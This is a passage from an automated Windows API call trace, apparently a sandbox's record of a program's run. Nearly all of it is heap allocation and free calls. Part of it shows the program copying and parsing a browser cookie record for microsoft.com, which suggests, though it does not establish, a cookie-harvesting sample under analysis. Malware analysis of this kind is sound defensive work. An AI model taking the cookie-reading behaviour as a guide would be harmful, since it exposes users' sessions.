hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613b00 | out: hHeap=0x5f0000) returned 1 [0181.381] GetProcessHeap () returned 0x5f0000 [0181.381] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6139e0 | out: hHeap=0x5f0000) returned 1 [0181.381] GetProcessHeap () returned 0x5f0000 [0181.381] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613ad0 | out: hHeap=0x5f0000) returned 1 [0181.381] GetProcessHeap () returned 0x5f0000 [0181.381] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x636200 | out: hHeap=0x5f0000) returned 1 [0181.381] GetProcessHeap () returned 0x5f0000 [0181.381] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.382] GetProcessHeap () returned 0x5f0000 [0181.382] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x636100 | out: hHeap=0x5f0000) returned 1 [0181.382] GetProcessHeap () returned 0x5f0000 [0181.382] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5d0 | out: hHeap=0x5f0000) returned 1 [0181.382] GetProcessHeap () returned 0x5f0000 [0181.382] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.382] GetProcessHeap () returned 0x5f0000 [0181.382] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613aa0 | out: hHeap=0x5f0000) returned 1 [0181.382] GetProcessHeap () returned 0x5f0000 [0181.382] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613b90 | out: hHeap=0x5f0000) returned 1 [0181.382] GetProcessHeap () returned 0x5f0000 [0181.382] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f550 | out: hHeap=0x5f0000) returned 1 [0181.382] GetProcessHeap () returned 0x5f0000 [0181.382] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f490 | out: hHeap=0x5f0000) returned 1 [0181.382] GetProcessHeap () returned 0x5f0000 [0181.382] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f480 | out: hHeap=0x5f0000) returned 1 [0181.382] GetProcessHeap () returned 0x5f0000 [0181.382] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f670 | out: hHeap=0x5f0000) returned 1 [0181.382] GetProcessHeap () returned 0x5f0000 [0181.382] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f540 | out: hHeap=0x5f0000) returned 1 [0181.382] GetProcessHeap () returned 0x5f0000 [0181.382] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f530 | out: hHeap=0x5f0000) returned 1 [0181.382] GetProcessHeap () returned 0x5f0000 [0181.382] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f660 | out: hHeap=0x5f0000) returned 1 [0181.382] GetProcessHeap () returned 0x5f0000 [0181.382] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f590 | out: hHeap=0x5f0000) returned 1 [0181.382] GetProcessHeap () returned 0x5f0000 [0181.382] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.382] GetProcessHeap () returned 0x5f0000 [0181.382] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f640 | out: hHeap=0x5f0000) returned 1 [0181.382] GetProcessHeap () returned 0x5f0000 [0181.382] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5a0 | out: hHeap=0x5f0000) returned 1 [0181.382] GetProcessHeap () returned 0x5f0000 [0181.382] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.382] GetProcessHeap () returned 0x5f0000 [0181.382] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f560 | out: hHeap=0x5f0000) returned 1 [0181.382] GetProcessHeap () returned 0x5f0000 [0181.382] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.383] GetProcessHeap () returned 0x5f0000 [0181.383] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.383] GetProcessHeap () returned 0x5f0000 [0181.383] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f630 | out: hHeap=0x5f0000) returned 1 [0181.383] GetProcessHeap () returned 0x5f0000 [0181.383] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.383] GetProcessHeap () returned 0x5f0000 [0181.383] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613860 | out: hHeap=0x5f0000) returned 1 [0181.383] GetProcessHeap () returned 0x5f0000 [0181.383] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625ca0 | out: hHeap=0x5f0000) returned 1 [0181.383] lstrlenA (lpString="\n") returned 1 [0181.383] GetProcessHeap () returned 0x5f0000 [0181.383] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f480 [0181.383] lstrcpyA (in: lpString1=0x61f480, lpString2="\n" | out: lpString1="\n") returned="\n" [0181.383] lstrlenA (lpString="\n_EDGE_V\n1\nmicrosoft.com/\n9216\n1130274944\n30991936\n3493210234\n30912613\n") returned 71 [0181.383] GetProcessHeap () returned 0x5f0000 [0181.383] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x48) returned 0x620820 [0181.383] lstrcpyA (in: lpString1=0x620820, lpString2="\n_EDGE_V\n1\nmicrosoft.com/\n9216\n1130274944\n30991936\n3493210234\n30912613\n" | out: lpString1="\n_EDGE_V\n1\nmicrosoft.com/\n9216\n1130274944\n30991936\n3493210234\n30912613\n") returned="\n_EDGE_V\n1\nmicrosoft.com/\n9216\n1130274944\n30991936\n3493210234\n30912613\n" [0181.383] GetProcessHeap () returned 0x5f0000 [0181.383] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f510 [0181.383] GetProcessHeap () returned 0x5f0000 [0181.383] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f660 [0181.383] GetProcessHeap () returned 0x5f0000 [0181.383] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f5d0 [0181.383] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.383] GetProcessHeap () returned 0x5f0000 [0181.384] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5d0 | out: hHeap=0x5f0000) returned 1 [0181.384] GetProcessHeap () returned 0x5f0000 [0181.384] GetProcessHeap () returned 0x5f0000 [0181.384] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f520 [0181.384] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.384] GetProcessHeap () returned 0x5f0000 [0181.384] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.384] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f660, Size=0x5) returned 0x61f640 [0181.384] GetProcessHeap () returned 0x5f0000 [0181.384] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f510, Size=0x48) returned 0x620140 [0181.384] GetProcessHeap () returned 0x5f0000 [0181.384] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f520 [0181.384] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.384] GetProcessHeap () returned 0x5f0000 [0181.384] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.384] GetProcessHeap () returned 0x5f0000 [0181.384] GetProcessHeap () returned 0x5f0000 [0181.384] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f660 [0181.384] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.384] GetProcessHeap () returned 0x5f0000 [0181.384] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f660 | out: hHeap=0x5f0000) returned 1 [0181.384] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f640, Size=0x9) returned 0x61f600 [0181.384] GetProcessHeap () returned 0x5f0000 [0181.384] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f5b0 [0181.384] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.384] GetProcessHeap () returned 0x5f0000 [0181.385] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.385] GetProcessHeap () returned 0x5f0000 [0181.385] GetProcessHeap () returned 0x5f0000 [0181.385] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f630 [0181.385] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.385] GetProcessHeap () returned 0x5f0000 [0181.385] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f630 | out: hHeap=0x5f0000) returned 1 [0181.385] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f600, Size=0x11) returned 0x6363a0 [0181.385] GetProcessHeap () returned 0x5f0000 [0181.385] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f580 [0181.385] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.385] GetProcessHeap () returned 0x5f0000 [0181.385] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.385] GetProcessHeap () returned 0x5f0000 [0181.385] GetProcessHeap () returned 0x5f0000 [0181.385] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f660 [0181.385] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.385] GetProcessHeap () returned 0x5f0000 [0181.385] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f660 | out: hHeap=0x5f0000) returned 1 [0181.385] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6363a0, Size=0x21) returned 0x613b60 [0181.385] GetProcessHeap () returned 0x5f0000 [0181.385] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f620 [0181.386] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.386] GetProcessHeap () returned 0x5f0000 [0181.386] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f620 | out: hHeap=0x5f0000) returned 1 [0181.386] GetProcessHeap () returned 0x5f0000 [0181.386] GetProcessHeap () returned 0x5f0000 [0181.386] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f660 [0181.386] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.386] GetProcessHeap () returned 0x5f0000 [0181.386] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f660 | out: hHeap=0x5f0000) returned 1 [0181.386] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613b60, Size=0x41) returned 0x6209b0 [0181.386] GetProcessHeap () returned 0x5f0000 [0181.386] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f670 [0181.386] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.386] GetProcessHeap () returned 0x5f0000 [0181.386] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f670 | out: hHeap=0x5f0000) returned 1 [0181.386] GetProcessHeap () returned 0x5f0000 [0181.386] GetProcessHeap () returned 0x5f0000 [0181.386] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f510 [0181.386] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.386] GetProcessHeap () returned 0x5f0000 [0181.386] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.386] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6209b0, Size=0x29) returned 0x613aa0 [0181.386] GetProcessHeap () returned 0x5f0000 [0181.386] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f480 | out: hHeap=0x5f0000) returned 1 [0181.386] GetProcessHeap () returned 0x5f0000 [0181.387] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620820 | out: hHeap=0x5f0000) returned 1 [0181.387] lstrlenA (lpString="/") returned 1 [0181.387] GetProcessHeap () returned 0x5f0000 [0181.387] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f510 [0181.387] lstrcpyA (in: lpString1=0x61f510, lpString2="/" | out: lpString1="/") returned="/" [0181.387] lstrlenA (lpString="1") returned 1 [0181.387] GetProcessHeap () returned 0x5f0000 [0181.387] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f600 [0181.387] lstrcpyA (in: lpString1=0x61f600, lpString2="1" | out: lpString1="1") returned="1" [0181.387] lstrlenA (lpString="1") returned 1 [0181.387] GetProcessHeap () returned 0x5f0000 [0181.387] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f580 [0181.387] lstrcpyA (in: lpString1=0x61f580, lpString2="1" | out: lpString1="1") returned="1" [0181.387] GetProcessHeap () returned 0x5f0000 [0181.387] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f520 [0181.387] GetProcessHeap () returned 0x5f0000 [0181.387] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f4a0 [0181.387] GetProcessHeap () returned 0x5f0000 [0181.387] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.387] GetProcessHeap () returned 0x5f0000 [0181.387] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.387] GetProcessHeap () returned 0x5f0000 [0181.387] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.387] GetProcessHeap () returned 0x5f0000 [0181.387] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.387] lstrlenA (lpString="1") returned 1 [0181.387] GetProcessHeap () returned 0x5f0000 [0181.387] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f580 [0181.387] lstrcpyA (in: lpString1=0x61f580, lpString2="1" | out: lpString1="1") returned="1" [0181.387] lstrlenA (lpString="") returned 0 [0181.387] GetProcessHeap () returned 0x5f0000 [0181.387] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f510 [0181.387] lstrcpyA (in: lpString1=0x61f510, lpString2="" | out: lpString1="") returned="" [0181.387] GetProcessHeap () returned 0x5f0000 [0181.388] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.388] lstrlenA (lpString="\r\n") returned 2 [0181.388] GetProcessHeap () returned 0x5f0000 [0181.388] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f550 [0181.388] lstrcpyA (in: lpString1=0x61f550, lpString2="\r\n" | out: lpString1="\r\n") returned="\r\n" [0181.388] GetProcessHeap () returned 0x5f0000 [0181.388] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f550 | out: hHeap=0x5f0000) returned 1 [0181.388] lstrlenA (lpString="||") returned 2 [0181.388] GetProcessHeap () returned 0x5f0000 [0181.388] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f660 [0181.388] lstrcpyA (in: lpString1=0x61f660, lpString2="||" | out: lpString1="||") returned="||" [0181.388] lstrlenA (lpString="|") returned 1 [0181.388] GetProcessHeap () returned 0x5f0000 [0181.388] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f480 [0181.388] lstrcpyA (in: lpString1=0x61f480, lpString2="|" | out: lpString1="|") returned="|" [0181.388] lstrlenA (lpString="9216") returned 4 [0181.388] GetProcessHeap () returned 0x5f0000 [0181.388] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f520 [0181.388] lstrcpyA (in: lpString1=0x61f520, lpString2="9216" | out: lpString1="9216") returned="9216" [0181.388] GetProcessHeap () returned 0x5f0000 [0181.388] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f640 [0181.388] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.388] GetProcessHeap () returned 0x5f0000 [0181.388] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f640 | out: hHeap=0x5f0000) returned 1 [0181.388] StrToInt64ExA (in: pszString="9216", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 1 [0181.388] lstrlenA (lpString="1130274944") returned 10 [0181.388] GetProcessHeap () returned 0x5f0000 [0181.388] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f600 [0181.388] lstrcpyA (in: lpString1=0x61f600, lpString2="1130274944" | out: lpString1="1130274944") returned="1130274944" [0181.388] GetProcessHeap () returned 0x5f0000 [0181.388] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f560 [0181.389] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.389] GetProcessHeap () returned 0x5f0000 [0181.389] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f560 | out: hHeap=0x5f0000) returned 1 [0181.389] StrToInt64ExA (in: pszString="1130274944", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 1 [0181.389] lstrlenA (lpString="|") returned 1 [0181.389] GetProcessHeap () returned 0x5f0000 [0181.389] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f580 [0181.389] lstrcpyA (in: lpString1=0x61f580, lpString2="|" | out: lpString1="|") returned="|" [0181.389] lstrlenA (lpString="9216") returned 4 [0181.389] GetProcessHeap () returned 0x5f0000 [0181.389] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f590 [0181.389] lstrcpyA (in: lpString1=0x61f590, lpString2="9216" | out: lpString1="9216") returned="9216" [0181.389] GetProcessHeap () returned 0x5f0000 [0181.389] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f620 [0181.389] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.389] GetProcessHeap () returned 0x5f0000 [0181.389] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f620 | out: hHeap=0x5f0000) returned 1 [0181.389] StrToInt64ExA (in: pszString="9216", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 1 [0181.389] lstrlenA (lpString="1130274944") returned 10 [0181.389] GetProcessHeap () returned 0x5f0000 [0181.389] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f530 [0181.389] lstrcpyA (in: lpString1=0x61f530, lpString2="1130274944" | out: lpString1="1130274944") returned="1130274944" [0181.389] GetProcessHeap () returned 0x5f0000 [0181.389] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f540 [0181.389] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.389] GetProcessHeap () returned 0x5f0000 [0181.390] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f540 | out: hHeap=0x5f0000) returned 1 [0181.390] StrToInt64ExA (in: pszString="1130274944", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 1 [0181.390] lstrlenA (lpString="|") returned 1 [0181.390] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f620 [0181.390] lstrcpyA (in: lpString1=0x61f620, lpString2="|" | out: lpString1="|") returned="|" [0181.390] lstrlenA (lpString="|") returned 1 [0181.390] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f540 [0181.390] lstrcpyA (in: lpString1=0x61f540, lpString2="|" | out: lpString1="|") returned="|" [0181.390] lstrlenA (lpString="|") returned 1 [0181.390] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f670 [0181.390] lstrcpyA (in: lpString1=0x61f670, lpString2="|" | out: lpString1="|") returned="|" [0181.390] lstrlenA (lpString="|") returned 1 [0181.390] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f5a0 [0181.390] lstrcpyA (in: lpString1=0x61f5a0, lpString2="|" | out: lpString1="|") returned="|" [0181.390] lstrlenA (lpString="|") returned 1 [0181.390] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f560 [0181.390] lstrcpyA (in: lpString1=0x61f560, lpString2="|" | out: lpString1="|") returned="|" [0181.390] GetProcessHeap () returned 0x5f0000 [0181.390] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f630 [0181.390] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f490 [0181.390] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.390] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f490 | out: hHeap=0x5f0000) returned 1 [0181.390] GetProcessHeap () returned 0x5f0000 [0181.390] GetProcessHeap () returned 0x5f0000 [0181.390] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f550 [0181.390] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.391] GetProcessHeap () returned 0x5f0000 [0181.391] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f550 | out: hHeap=0x5f0000) returned 1 [0181.391] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f630, Size=0x1) returned 0x61f550 [0181.391] GetProcessHeap () returned 0x5f0000 [0181.391] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f490 [0181.391] GetProcessHeap () returned 0x5f0000 [0181.391] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f5d0 [0181.391] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.391] GetProcessHeap () returned 0x5f0000 [0181.391] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5d0 | out: hHeap=0x5f0000) returned 1 [0181.391] GetProcessHeap () returned 0x5f0000 [0181.391] GetProcessHeap () returned 0x5f0000 [0181.391] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f5b0 [0181.391] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.391] GetProcessHeap () returned 0x5f0000 [0181.391] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.391] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f490, Size=0xb) returned 0x61f5b0 [0181.391] GetProcessHeap () returned 0x5f0000 [0181.391] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f630 [0181.391] GetProcessHeap () returned 0x5f0000 [0181.391] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.391] GetProcessHeap () returned 0x5f0000 [0181.391] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f640 [0181.391] GetProcessHeap () returned 0x5f0000 [0181.391] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f490 [0181.391] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.391] GetProcessHeap () returned 0x5f0000 [0181.392] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f490 | out: hHeap=0x5f0000) returned 1 [0181.392] GetProcessHeap () returned 0x5f0000 [0181.392] GetProcessHeap () returned 0x5f0000 [0181.392] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f5b0 [0181.392] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.392] GetProcessHeap () returned 0x5f0000 [0181.392] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.392] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f640, Size=0xb) returned 0x61f490 [0181.392] GetProcessHeap () returned 0x5f0000 [0181.392] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f5b0 [0181.392] GetProcessHeap () returned 0x5f0000 [0181.392] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f490 | out: hHeap=0x5f0000) returned 1 [0181.392] lstrlenA (lpString="_EDGE_V") returned 7 [0181.392] GetProcessHeap () returned 0x5f0000 [0181.392] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x61f640 [0181.392] lstrcpyA (in: lpString1=0x61f640, lpString2="_EDGE_V" | out: lpString1="_EDGE_V") returned="_EDGE_V" [0181.392] GetProcessHeap () returned 0x5f0000 [0181.392] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f5c0 [0181.392] GetProcessHeap () returned 0x5f0000 [0181.392] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f490 [0181.392] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.392] GetProcessHeap () returned 0x5f0000 [0181.392] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f490 | out: hHeap=0x5f0000) returned 1 [0181.392] GetProcessHeap () returned 0x5f0000 [0181.392] GetProcessHeap () returned 0x5f0000 [0181.392] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f5d0 [0181.392] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.392] GetProcessHeap () returned 0x5f0000 [0181.393] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5d0 | out: hHeap=0x5f0000) returned 1 [0181.393] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f5c0, Size=0xd) returned 0x61f490 [0181.393] lstrlenA (lpString="") returned 0 [0181.393] GetProcessHeap () returned 0x5f0000 [0181.393] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f5c0 [0181.393] lstrcpyA (in: lpString1=0x61f5c0, lpString2="" | out: lpString1="") returned="" [0181.393] GetProcessHeap () returned 0x5f0000 [0181.393] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f5d0 [0181.393] GetProcessHeap () returned 0x5f0000 [0181.393] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f7e0 [0181.393] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.393] GetProcessHeap () returned 0x5f0000 [0181.393] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f7e0 | out: hHeap=0x5f0000) returned 1 [0181.393] GetProcessHeap () returned 0x5f0000 